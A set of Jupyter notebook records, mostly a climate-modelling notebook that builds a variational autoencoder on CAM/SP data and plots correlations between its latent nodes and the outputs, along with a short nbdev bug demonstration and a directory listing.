" Volume in drive C has no label.\n Volume Serial Number is 8C76-95FD\n\n Directory of C:\\Users\\ajaym\\Desktop\\Internship\\TakenMind Internship\n\n02-11-2020 11:10 <DIR> .\n02-11-2020 11:10 <DIR> ..\n02-11-2020 11:08 <DIR> .ipynb_checkpoints\n02-11-2020 11:02 927 AllPackages.txt\n02-11-2020 11:09 927 AllPackages2.txt\n02-11-2020 10:29 1,129 Exploring Jupyter Notebook.ipynb\n02-11-2020 11:10 2,043 Untitled.ipynb\n 4 File(s) 5,026 bytes\n 3 Dir(s) 15,121,637,376 bytes free\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
e707e0ef442e6f1adbca32a733666bd8ce6d4105 | 3,482 | ipynb | Jupyter Notebook | index.ipynb | thakkarparth007/nbdev_all_demo | 7caf2a1ed1e416b4e7b787298c844afc0dd3c35a | [
"Apache-2.0"
] | null | null | null | index.ipynb | thakkarparth007/nbdev_all_demo | 7caf2a1ed1e416b4e7b787298c844afc0dd3c35a | [
"Apache-2.0"
] | null | null | null | index.ipynb | thakkarparth007/nbdev_all_demo | 7caf2a1ed1e416b4e7b787298c844afc0dd3c35a | [
"Apache-2.0"
] | null | null | null | 27.203125 | 294 | 0.559161 | [
[
[
"#hide\nfrom nbdev_all_demo.m1 import *",
"m1 loaded, pi= 3.141592653589793\n"
]
],
[
[
"# nbdev_all_demo\n\n> Demoing the issue at https://github.com/fastai/nbdev/issues/328",
"_____no_output_____"
],
[
"## Summary of the issue",
"_____no_output_____"
],
[
"I've created two nearly identical notebooks: `m1` and `m1_copy`, which both import the math module as `math1` and `math2` respectively, and 'exports' them by default (via \\_all_).\n\nThe only catch is:\n- First I ran nbdev_build_lib for both, which generated `m1.py` and `m1_copy.py` respectively\n- In `m1_copy.py`, I added an extra print statement and then ran `nbdev_upload_lib`\n\nThis added the print statement in `m1_copy.ipynb`, but it also incorrectly replaced the `_all_ = ['math2']` line with `#nbdev_comment _all_ = ['math2']`. This is likely happening because when `nbdev_upload_lib` parses `m1_copy.py`, it doesn't treat `#nbdev_comment` comments specially.\n\nSo, on running `nbdev_build_lib` again (say, I changed some random notebook), the `__all__` variable in `m1_copy.py` becomes `[]`, as there is no (uncommented) `_all_ = ['math2']` statement in the notebook.",
"_____no_output_____"
],
[
"So now, when I try to use `math2` after importing `m1_copy`, it gives an error",
"_____no_output_____"
]
],
[
[
"from nbdev_all_demo.m1_copy import *",
"m1_copy loaded, pi= 3.141592653589793\nThis is added directly in m1_copy.py\n"
],
[
"math2.pi",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
e708050c0a3146188839e2196958c44ffdf336ec | 380,231 | ipynb | Jupyter Notebook | VAE_clim_clim_conv_lin_corr_lat_space.ipynb | GunnarBehrens/CBRAIN-CAM | 1b59b5b4731ada7c077c181b543339412d25e5c3 | [
"MIT"
] | null | null | null | VAE_clim_clim_conv_lin_corr_lat_space.ipynb | GunnarBehrens/CBRAIN-CAM | 1b59b5b4731ada7c077c181b543339412d25e5c3 | [
"MIT"
] | null | null | null | VAE_clim_clim_conv_lin_corr_lat_space.ipynb | GunnarBehrens/CBRAIN-CAM | 1b59b5b4731ada7c077c181b543339412d25e5c3 | [
"MIT"
] | null | null | null | 289.149049 | 166,196 | 0.903545 | [
[
[
"# architecture of VAE$_{clim \\rightarrow clim + conv}$",
"_____no_output_____"
]
],
[
[
"from sklearn.decomposition import PCA\n\nfrom tensorflow.keras.layers import Lambda, Input, Dense\nfrom cbrain.layers import *\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.losses import mse, binary_crossentropy\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.callbacks import LearningRateScheduler,Callback\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nimport os\n\n\nimport tensorflow as tf\nfrom cbrain.imports import *\n\nfrom cbrain.utils import *\nimport pandas as ps\n\n# reparameterization trick of VAE \n# instead of sampling from Q(z|X), sample epsilon = N(0,I)\n# z = z_mean + sqrt(var) * epsilon\ndef sampling(args):\n \"\"\"Reparameterization trick by sampling from an isotropic unit Gaussian.\n\n # Arguments\n args (tensor): mean and log of variance of Q(z|X)\n\n # Returns\n z (tensor): sampled latent vector\n based on VAE presented on keras webpage for keras version 1 /\n recent keras VAE version can be seen on\n https://keras.io/examples/generative/vae/\n \"\"\"\n\n z_mean, z_log_var = args\n batch= K.shape(z_mean)[0]\n dim=K.int_shape(z_mean)[1]\n # by default, random_normal has mean = 0 and std = 1.0\n epsilon=K.random_normal(shape=(batch,dim)) # epsilion= random_normal distributed tensor\n sample_prob=z_mean+K.exp(0.5*z_log_var)*epsilon #exp= elementwise exponential\n return sample_prob\n\n# kl annealing to improve reproduction skills of VAE \nklstart = 2\n# number of epochs over which KL scaling is increased from 0 to 1\nkl_annealtime = 5\n\nclass AnnealingCallback(Callback):\n def __init__(self, weight):\n self.weight = weight\n def on_epoch_end (self, epoch, logs={}):\n if epoch > klstart :\n new_weight = min(K.get_value(self.weight) + (1./kl_annealtime), 1.)\n K.set_value(self.weight, new_weight)\n print (\"Current KL Weight is \" + str(K.get_value(self.weight)))\n\n\n# the starting value of weight is 0\n# define it as a keras backend variable\nweight = K.variable(0.)\n\n \noriginal_dim_input=64 # input node size (CAM variables)\n\noriginal_dim_output=int(65+64) # output node size (SP + CAM variables)\n\n\n# network parameters\ninput_shape = (original_dim_input,)\nout_shape=(original_dim_output,)\nintermediate_dim = 463 # nodes in first hidden layers of encoder and last hidden layers of decoder \nbatch_size = 714\nlatent_dim = 5 # latent space dimensions\nepochs = 40 \n \n## Encoder \ninputs =Input(shape=input_shape, name='encoder_input')\nx_0 =Dense(intermediate_dim, activation='relu')(inputs)\nx_1 =Dense(intermediate_dim, activation='relu')(x_0)\nx_2 =Dense(int(np.round(intermediate_dim/2)), activation='relu')(x_1)\nx_3 =Dense(int(np.round(intermediate_dim/4)), activation='relu')(x_2)\nx_4 =Dense(int(np.round(intermediate_dim/8)), activation='relu')(x_3)\nx_5 =Dense(int(np.round(intermediate_dim/16)), activation='relu')(x_4)\n\n\n\nz_mean = Dense(latent_dim, name='z_mean')(x_5)\nz_log_var = Dense(latent_dim, name='z_log_var')(x_5)\n\n\n\n# reparametrization trick\nz = Lambda(sampling, output_shape=(latent_dim), name='z')([z_mean, z_log_var])\n\n# instantiate encoder model\nencoder = Model(inputs, [z_mean, z_log_var, z], name='encoder')\nencoder.summary()\n\n\n## Decoder\ndecoder_inputs =Input(shape=(latent_dim,), name='decoder_input')\nx_1 =Dense(int(np.round(intermediate_dim/16)), activation='relu')(decoder_inputs)\nx_2 =Dense(int(np.round(intermediate_dim/8)), activation='relu')(x_1)\nx_3 =Dense(int(np.round(intermediate_dim/4)), activation='relu')(x_2)\nx_4 =Dense(int(np.round(intermediate_dim/2)), activation='relu')(x_3)\nx_5 =Dense(intermediate_dim, activation='relu')(x_4)\nx_6 =Dense(intermediate_dim, activation='relu')(x_5)\n\noutputs = Dense(original_dim_output, activation='elu')(x_6)\n\ndecoder = Model(decoder_inputs, outputs, name='decoder')\ndecoder.summary()\n\nemul_outputs=decoder(encoder(inputs)[2])\n\nkl_loss = 1 + z_log_var - K.square(z_mean) - K.exp(z_log_var)\nkl_loss = K.sum(kl_loss, axis=-1)\nkl_loss *= -0.5\nVAE_loss = K.mean(kl_loss*weight)\n\n\nVAE_clim_clim_conv=Model(inputs,emul_outputs)\nVAE_clim_clim_conv.add_loss(VAE_loss)\nVAE_clim_clim_conv.add_metric(kl_loss, name='kl_loss', aggregation='mean')\n\n\n#loading the output normalization scalars for SP variables ( stds over 3 months of SP simulation)\n\nscale_array=ps.read_csv('nn_config/scale_dicts/Scaling_cond_VAE.csv')\n\n\nPHQ_std_surf=scale_array.PHQ_std.values[-1]\n\nTPHYSTND_std_23=scale_array.TPHYSTND_std.values[-1]# for dT/dt we are using the std on level 23 ~ 845 hPa\n\nPRECT_std=scale_array.PRECT_std.values\nFSNS_std=scale_array.FSNS_std.values\nFSNT_std=scale_array.FSNT_std.values\nFLNS_std=scale_array.FLNS_std.values\nFLNT_std=scale_array.FLNT_std.values\n\n# and the CAM variables \nscale_array_2D=ps.read_csv('nn_config/scale_dicts/Scaling_enc_II_range_profiles.csv')\nscale_array_1D=ps.read_csv('nn_config/scale_dicts/Scaling_enc_II_range.csv')\n\nTBP_std_surf=scale_array_2D.TBP_std.values[-1]\n\nQBP_std_surf=scale_array_2D.QBP_std.values[-1]\n\nQ_lat_std_surf=scale_array_1D.Q_lat_std.values\n\nQ_sens_std_surf=scale_array_1D.Q_sens_std.values\n\n\nQ_solar_std_surf=scale_array_1D.Q_sol_std.values\n\nPS_std_surf=scale_array_1D.PS_std.values\n\n\n# defining the scaling dict for the VAE training \n\nscale_dict_II = {\n 'PHQ': 1/PHQ_std_surf, \n 'QBP':1/QBP_std_surf,\n 'TPHYSTND': 1/TPHYSTND_std_23, \n 'TBP':1/TBP_std_surf,\n 'FSNT': 1/FSNT_std, \n 'FSNS': 1/FSNS_std, \n 'FLNT': 1/FLNT_std, \n 'FLNS': 1/FLNS_std, \n 'PRECT': 1/PRECT_std, \n 'LHFLX': 1/Q_lat_std_surf, \n 'SHFLX': 1/Q_sens_std_surf, \n 'SOLIN': 1/Q_solar_std_surf,\n 'PS':1/PS_std_surf\n}\n\nin_vars = ['QBP', 'TBP','PS', 'SOLIN', 'SHFLX', 'LHFLX']\nout_vars = ['PHQ','TPHYSTND','FSNT', 'FSNS', 'FLNT', 'FLNS', 'PRECT','QBP', 'TBP','PS', 'SOLIN', 'SHFLX', 'LHFLX']\n\n## CAM variables\n#QBP = specific humidity\n#TBP = temperature \n#PS = surface pressure \n#SOLIN = solar insolation\n#SHFLX = surface sensible heat flux \n#LHFLX = surface latent heat flux\n\n## SP variables=\n#PHQ = specific humidity tendency \n#TPHYSTND = temperature tendency \n#FSNT = shortwave heat flux model top\n#FSNS = shortwave heat flux model surface \n#FLNT = longwave heat flux model top (OLR)\n#FLNS = longwave heat flux model surface \n#PRECT = precipitation rate \n\n# Takes representative value for PS since purpose is normalization\nPS = 1e5; P0 = 1e5;\nP = P0*hyai+PS*hybi; # Total pressure [Pa]\ndP = P[1:]-P[:-1];\n\n\nfrom cbrain.data_generator import DataGenerator",
"In /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe text.latex.preview rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe mathtext.fallback_to_cm rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: Support for setting the 'mathtext.fallback_to_cm' rcParam is deprecated since 3.3 and will be removed two minor releases later; use 'mathtext.fallback : 'cm' instead.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe validate_bool_maybe_none function was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe savefig.jpeg_quality rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe keymap.all_axes rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe animation.avconv_path rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\nIn /pf/b/b309162/work/miniconda3/envs/thunder_cpu_II_plot/lib/python3.8/site-packages/matplotlib/mpl-data/stylelib/_classic_test.mplstyle: \nThe animation.avconv_args rcparam was deprecated in Matplotlib 3.3 and will be removed two minor releases later.\n"
],
[
"#load the 3month SP test data set \nval_gen_II = DataGenerator(\n data_fn = '../preprocessed_data/1918_train_3_month_OND.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = '../preprocessed_data/000_norm_1_month.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict_II,\n batch_size=8192,\n shuffle=True\n)\n",
"_____no_output_____"
],
[
"VAE_clim_clim_conv.load_weights('./saved_models/VAE_clim_clim_conv/VAE_clim_clim_conv_BN5_40_opt_anneal.h5')",
"_____no_output_____"
],
[
"# define latitude, longitude and time \nlat=np.arange(-90,90,180/64)\nlon=np.arange(-180,180,360/128)\ntime=4415",
"_____no_output_____"
],
[
"#latitutde and longitude of each grid cell as function of time step \nlatit_array=np.reshape((lat.T*np.ones((lat.size,lon.size)).T).T,int(lat.size*lon.size))\nlonit_array=np.reshape(lon*np.ones((lat.size,lon.size)),int(lat.size*lon.size))\n\nlatit_timestep_array=np.reshape((latit_array.T*np.ones((latit_array.size,time)).T),int(latit_array.size*time))\nlonit_timestep_array=np.reshape((lonit_array.T*np.ones((lonit_array.size,time)).T),int(lonit_array.size*time))\n",
"_____no_output_____"
],
[
"#load precomputed 5D latent space of VAE_clim_clim_conv\n\nencoder_resp=np.load('VAE_clim_clim_conv_encoder_pred_3_month_global.npy')",
"_____no_output_____"
],
[
"#load saved predicted output data set for encoder_resp or predict output data using val_gen_II\n\nVAE_resp=np.load('VAE_clim_clim_conv_pred_3_month_global.npy')#val_gen_II.output_transform.inverse_transform(decoder.predict(encoder_resp))",
"_____no_output_____"
]
],
[
[
"swap nodes to seperate latent nodes which drive large-scale varaibility from convective regime latent nodes\n\noriginal latent node 1 → Node 3\n\noriginal latent node 2 → Node 2\n\noriginal latent node 3 → Node 4\n\noriginal latent node 4 → Node 5\n\noriginal latent node 5 → Node 1",
"_____no_output_____"
],
[
"# Compute linear correlation R in space-time between latent nodes and output data set ",
"_____no_output_____"
]
],
[
[
"overall_corr_node_0=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_1=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_2=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_3=np.nan* np.zeros(VAE_resp[0].size)\noverall_corr_node_4=np.nan* np.zeros(VAE_resp[0].size)\n\n## compute R for between respective latent nodes and output predictions\n## order of latent nodes swapped \nfor i in tqdm(np.arange(overall_corr_node_0.size)):\n \n overall_corr_node_0[i]=np.corrcoef(encoder_resp[:,4],VAE_resp[:,i])[0,1]\n overall_corr_node_1[i]=np.corrcoef(encoder_resp[:,1],VAE_resp[:,i])[0,1]\n overall_corr_node_2[i]=np.corrcoef(encoder_resp[:,0],VAE_resp[:,i])[0,1]\n overall_corr_node_3[i]=np.corrcoef(encoder_resp[:,2],VAE_resp[:,i])[0,1]\n overall_corr_node_4[i]=np.corrcoef(encoder_resp[:,3],VAE_resp[:,i])[0,1]\n",
"<ipython-input-8-540901828648>:9: TqdmDeprecationWarning: This function will be removed in tqdm==5.0.0\nPlease use `tqdm.notebook.tqdm` instead of `tqdm.tqdm_notebook`\n for i in tqdm(np.arange(overall_corr_node_0.size)):\n"
],
[
"# generate variable list for sub-grid-scale SP varaibles\nout_labels=['dq/dt '+str(np.round(P[0]/100)),\n 'dq/dt '+str(np.round(P[1]/100)),\n 'dq/dt '+str(np.round(P[2]/100)),\n 'dq/dt '+str(np.round(P[3]/100)),\n 'dq/dt '+str(np.round(P[4]/100)),\n 'dq/dt '+str(np.round(P[5]/100)),\n 'dq/dt '+str(np.round(P[6]/100)),\n 'dq/dt '+str(np.round(P[7]/100)),\n 'dq/dt '+str(np.round(P[8]/100)),\n 'dq/dt '+str(np.round(P[9]/100)),\n 'dq/dt '+str(np.round(P[10]/100)),\n 'dq/dt '+str(np.round(P[11]/100)),\n 'dq/dt '+str(np.round(P[12]/100)),\n 'dq/dt '+str(np.round(P[13]/100)),\n 'dq/dt '+str(np.round(P[14]/100)),\n 'dq/dt '+str(np.round(P[15]/100)),\n 'dq/dt '+str(np.round(P[16]/100)),\n 'dq/dt '+str(np.round(P[17]/100)),\n 'dq/dt '+str(np.round(P[18]/100)),\n 'dq/dt '+str(np.round(P[19]/100)),\n 'dq/dt '+str(np.round(P[20]/100)),\n 'dq/dt '+str(np.round(P[21]/100)),\n 'dq/dt '+str(np.round(P[22]/100)),\n 'dq/dt '+str(np.round(P[23]/100)),\n 'dq/dt '+str(np.round(P[24]/100)),\n 'dq/dt '+str(np.round(P[25]/100)),\n 'dq/dt '+str(np.round(P[26]/100)),\n 'dq/dt '+str(np.round(P[27]/100)),\n 'dq/dt '+str(np.round(P[28]/100)),\n 'dq/dt '+str(np.round(P[29]/100)),\n 'dT/dt '+str(np.round(P[0]/100)),'','','', \n 'dT/dt '+str(np.round(P[4]/100)),'','','','',\n 'dT/dt '+str(np.round(P[9]/100)),'','','','', \n 'dT/dt '+str(np.round(P[14]/100)),'','','','',\n 'dT/dt '+str(np.round(P[19]/100)),'','','','',\n 'dT/dt '+str(np.round(P[24]/100)),'','','','',\n 'dT/dt '+str(np.round(P[29]/100)),'Q_sw_top','Q_sw_surf','Q_lw_top','Q_lw_surf','precip']\n\n## and large-scale climate variables of CAM \n\nin_labels=['Q '+str(np.round(P[0]/100)),\n 'Q '+str(np.round(P[1]/100)),\n 'Q '+str(np.round(P[2]/100)),\n 'Q '+str(np.round(P[3]/100)),\n 'Q '+str(np.round(P[4]/100)),\n 'Q '+str(np.round(P[5]/100)),\n 'Q '+str(np.round(P[6]/100)),\n 'Q '+str(np.round(P[7]/100)),\n 'Q '+str(np.round(P[8]/100)),\n 'Q '+str(np.round(P[9]/100)),\n 'Q '+str(np.round(P[10]/100)),\n 'Q '+str(np.round(P[11]/100)),\n 'Q '+str(np.round(P[12]/100)),\n 'Q '+str(np.round(P[13]/100)),\n 'Q '+str(np.round(P[14]/100)),\n 'Q '+str(np.round(P[15]/100)),\n 'Q '+str(np.round(P[16]/100)),\n 'Q '+str(np.round(P[17]/100)),\n 'Q '+str(np.round(P[18]/100)),\n 'Q '+str(np.round(P[19]/100)),\n 'Q '+str(np.round(P[20]/100)),\n 'Q '+str(np.round(P[21]/100)),\n 'Q '+str(np.round(P[22]/100)),\n 'Q '+str(np.round(P[23]/100)),\n 'Q '+str(np.round(P[24]/100)),\n 'Q '+str(np.round(P[25]/100)),\n 'Q '+str(np.round(P[26]/100)),\n 'Q '+str(np.round(P[27]/100)),\n 'Q '+str(np.round(P[28]/100)),\n 'Q '+str(np.round(P[29]/100)),\n 'T '+str(np.round(P[0]/100)),'','','', \n 'T '+str(np.round(P[4]/100)),'','','','',\n 'T '+str(np.round(P[9]/100)),'','','','', \n 'T '+str(np.round(P[14]/100)),'','','','',\n 'T '+str(np.round(P[19]/100)),'','','','',\n 'T '+str(np.round(P[24]/100)),'','','','',\n 'T '+str(np.round(P[29]/100)),'P_surf','Q_sol','Q_sens','Q_lat']\n\n\n\n# add the two list, create one list over entire VAE predictions \n \nall_labels=out_labels+in_labels\n",
"_____no_output_____"
],
[
"def quad_plot_R2_updated(SP_output_corr_node_0_R_2,\n SP_output_corr_node_1_R_2,\n SP_output_corr_node_2_R_2,\n SP_output_corr_node_3_R_2,\n SP_output_corr_node_4_R_2,\n press,labels):\n \n \"\"\"\n author: Gunnar Behrens\n plot squared linear correlation in space-time between latent nodes and VAE_clim_clim_conv predictions\n as vertical profiles in pressure coordinates for 3D variables and retrieve R² space-time values for 2D\n variables\n \n SP_output_corr_node_*_R_2 -- squarred corr coefs of each latent node \n press -- vertical axis in pressure coords\n labels -- predicted variable list\n \n \"\"\"\n \n import pandas as pd \n Press=press/100\n \n c_map=[[0,0,0,1],[1,0,1,1],[0,0,1,1],[0,0.4,0.5,1],[0.6,0.4,0,1]]\n plt.figure(1,(24,9))\n plt.subplot(1,4,1)\n plt.plot(SP_output_corr_node_0_R_2[0:30],Press[0:30],color=c_map[0],\n label='Node 1')\n plt.plot(SP_output_corr_node_1_R_2[0:30],Press[0:30],color=c_map[1],\n label='Node 2')\n plt.plot(SP_output_corr_node_2_R_2[0:30],Press[0:30],color=c_map[2],\n label='Node 3')\n plt.plot(SP_output_corr_node_3_R_2[0:30],Press[0:30],color=c_map[3],\n label='Node 4')\n plt.plot(SP_output_corr_node_4_R_2[0:30],Press[0:30],color=c_map[4],\n label='Node 5')\n plt.title('Specific Humidity Tend.', Fontsize=24)\n plt.legend(fontsize=17,loc=2)\n plt.ylabel('P [hPa]', Fontsize=24)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('R²', Fontsize=20)\n\n plt.xticks(Fontsize=16)\n plt.yticks(Fontsize=16)\n\n plt.grid(True)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_2=plt.subplot(1,4,2)\n plt.plot(SP_output_corr_node_0_R_2[30:60],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[30:60],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[30:60],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[30:60],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[30:60],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_2.set_yticklabels([])\n plt.xlabel('R²', Fontsize=20)\n\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.grid(True)\n \n plt.title('Temperature Tend.', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n\n ax_3=plt.subplot(1,4,3)\n plt.plot(SP_output_corr_node_0_R_2[65:95],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[65:95],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[65:95],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[65:95],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[65:95],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_3.set_yticklabels([])\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('R²', Fontsize=20)\n plt.grid(True)\n plt.title('Specific Humidity', Fontsize=24)\n inv=plt.gca()\n inv.invert_yaxis()\n \n ax_4=plt.subplot(1,4,4)\n plt.plot(SP_output_corr_node_0_R_2[95:125],Press[0:30],color=c_map[0])\n plt.plot(SP_output_corr_node_1_R_2[95:125],Press[0:30],color=c_map[1])\n plt.plot(SP_output_corr_node_2_R_2[95:125],Press[0:30],color=c_map[2])\n plt.plot(SP_output_corr_node_3_R_2[95:125],Press[0:30],color=c_map[3])\n plt.plot(SP_output_corr_node_4_R_2[95:125],Press[0:30],color=c_map[4])\n plt.xticks(Fontsize=16)\n ax_4.set_yticklabels([])\n plt.legend(fontsize=16)\n plt.xlim([0,1])\n plt.ylim([0,1000])\n plt.xlabel('R²', Fontsize=20)\n\n plt.grid(True)\n plt.title('Temperature', Fontsize=24 )\n inv=plt.gca()\n inv.invert_yaxis()\n\n \n \n scalar=[60,61,62,63,64,125,126,127,128]\n \n dg=pd.DataFrame([[labels[k],SP_output_corr_node_0_R_2[k],\n SP_output_corr_node_1_R_2[k],\n SP_output_corr_node_2_R_2[k],\n SP_output_corr_node_3_R_2[k],\n SP_output_corr_node_4_R_2[k]] for k in scalar],\n columns=['Variable','Node 0', 'Node 1','Node 2', 'Node 3','Node 4'])\n \n \n \n \n \n return dg",
"_____no_output_____"
],
[
"# plot vertical linear R² profiles in space-time \nquad_plot_R2_updated(overall_corr_node_0**2,\n overall_corr_node_1**2,\n overall_corr_node_2**2,\n overall_corr_node_3**2,\n overall_corr_node_4**2,\n P,all_labels)",
"<ipython-input-10-dd10d52bdd82>:36: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity Tend.', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:38: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.ylabel('P [hPa]', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:41: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:43: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:44: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.yticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:56: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:58: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:64: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature Tend.', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:74: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\n<ipython-input-10-dd10d52bdd82>:78: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:80: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Specific Humidity', Fontsize=24)\n<ipython-input-10-dd10d52bdd82>:90: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xticks(Fontsize=16)\nNo handles with labels found to put in legend.\n<ipython-input-10-dd10d52bdd82>:95: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.xlabel('R²', Fontsize=20)\n<ipython-input-10-dd10d52bdd82>:98: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title('Temperature', Fontsize=24 )\n"
],
[
"## transform encoder_resp and VAE_resp from space-time data sets into 3D arrays with (time, latitude*longitude, dim_3.size)\n\nencoder_resp_matr=np.reshape(encoder_resp,(time,lat.size*lon.size,encoder_resp[0,:].size))\noutput_resp_matr=np.reshape(VAE_resp,(time,lat.size*lon.size,VAE_resp[0,:].size))\n",
"_____no_output_____"
]
],
[
[
"# compute median squared linear correlation along time axis of 3D data arrays ",
"_____no_output_____"
],
[
"compute the linear correlation between latent nodes and the output data array in each horizontal grid cell ",
"_____no_output_____"
]
],
[
[
"overall_corr_node_0_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_1_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_2_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_3_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\noverall_corr_node_4_lat_lon=np.nan* np.zeros((output_resp_matr[0,:,0].size,output_resp_matr[0,0,:].size))\n\n\nfor i in tqdm(np.arange(overall_corr_node_0_lat_lon[:,1].size)):\n \n for j in np.arange(overall_corr_node_0_lat_lon[1,:].size):\n\n overall_corr_node_0_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,4],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_1_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,1],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_2_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,0],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_3_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,2],output_resp_matr[:,i,j])[0,1]\n overall_corr_node_4_lat_lon[i,j]=np.corrcoef(encoder_resp_matr[:,i,3],output_resp_matr[:,i,j])[0,1]\n",
"<ipython-input-10-387862e6db26>:8: TqdmDeprecationWarning: This function will be removed in tqdm==5.0.0\nPlease use `tqdm.notebook.tqdm` instead of `tqdm.tqdm_notebook`\n for i in tqdm(np.arange(overall_corr_node_0_lat_lon[:,1].size)):\n"
]
],
[
[
"plot the median of R² values as a function of pressure for 3D variables and construct table for 2D variables ",
"_____no_output_____"
]
],
[
[
